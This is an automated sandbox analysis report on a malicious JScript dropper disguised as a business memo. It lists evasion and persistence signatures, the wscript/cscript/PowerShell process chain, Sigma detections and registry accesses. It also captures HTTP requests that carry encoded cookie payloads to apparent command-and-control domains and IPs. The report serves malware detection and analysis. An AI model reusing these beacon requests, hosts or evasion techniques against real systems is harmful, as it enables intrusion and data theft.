Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Memo - Impairment Test 2023 MEX010B (5).js

Overview

General Information

Sample name:Memo - Impairment Test 2023 MEX010B (5).js
Analysis ID:1577279
MD5:95238ad5a91d721c6e8fdf4c36187798
SHA1:7b468a279606b62b0abe1a3e14aa16f0c9e6b93d
SHA256:53f8a46c948c968fe753a5f723bdf99d3b3d141dc3dec3d8e36480975c7ce879
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Loading BitLocker PowerShell Module
Potential evasive JS / VBS script found (domain check)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64native
  • wscript.exe (PID: 120 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
  • wscript.exe (PID: 5852 cmdline: C:\Windows\system32\wscript.EXE AUTOMO~1.JS MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • conhost.exe (PID: 8040 cmdline: "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS" MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cscript.exe (PID: 6476 cmdline: cscript AUTOMO~1.JS MD5: B8454647EFC71192BF7B1572D18F7BD8)
        • powershell.exe (PID: 8780 cmdline: powershell powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 2256 cmdline: C:\Windows\system32\wscript.EXE AUTOMO~1.JS MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • conhost.exe (PID: 8144 cmdline: "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS" MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cscript.exe (PID: 8168 cmdline: cscript AUTOMO~1.JS MD5: B8454647EFC71192BF7B1572D18F7BD8)
        • powershell.exe (PID: 2592 cmdline: powershell powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 1972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4972, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js", ProcessId: 120, ProcessName: wscript.exe
Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 120, TargetFilename: C:\Users\user\AppData\Roaming\Mozilla\Automotive Equipment.js
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE AUTOMO~1.JS, CommandLine: C:\Windows\system32\wscript.EXE AUTOMO~1.JS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1436, ProcessCommandLine: C:\Windows\system32\wscript.EXE AUTOMO~1.JS, ProcessId: 5852, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4972, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js", ProcessId: 120, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell, CommandLine: powershell powershell, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript AUTOMO~1.JS, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 6476, ParentProcessName: cscript.exe, ProcessCommandLine: powershell powershell, ProcessId: 8780, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 172.105.162.7:443 -> 192.168.11.20:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.167.35:443 -> 192.168.11.20:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 129.232.136.170:443 -> 192.168.11.20:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.198.240.43:443 -> 192.168.11.20:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.27.249:443 -> 192.168.11.20:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.218.116.137:443 -> 192.168.11.20:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.10:443 -> 192.168.11.20:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.198.240.43:443 -> 192.168.11.20:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 197.189.243.212:443 -> 192.168.11.20:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.167.35:443 -> 192.168.11.20:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 129.232.136.170:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.10:443 -> 192.168.11.20:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.10.224:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.105.162.7:443 -> 192.168.11.20:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 197.189.243.212:443 -> 192.168.11.20:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.1.204:443 -> 192.168.11.20:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.218.116.137:443 -> 192.168.11.20:49747 version: TLS 1.2
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewIP Address: 141.193.213.10 141.193.213.10
Source: Joe Sandbox ViewIP Address: 141.193.213.10 141.193.213.10
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/OJnp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Van9FowL05NwxgcgwmRl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfXT27gqBOtB6zkrWg41V5Dfe2bSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDpuMGd3e5SSMaJt5WTV5ja7bIN5KFLLfPQQEKyCpYBwWRKZKkRSAcAmkKYk75ymgYWRuS3Y/p94UItaThSBf+AAYyys7+PCH0W3OWN53L1KNOeiFucmX++YuKLlswTatWl/J4NlGGTOObaBPv4As0iid/0BAADtpw4=; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: acceleratedigital.com.auConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: saeedmdcat.comConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: wickandjuice.co.zaConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; 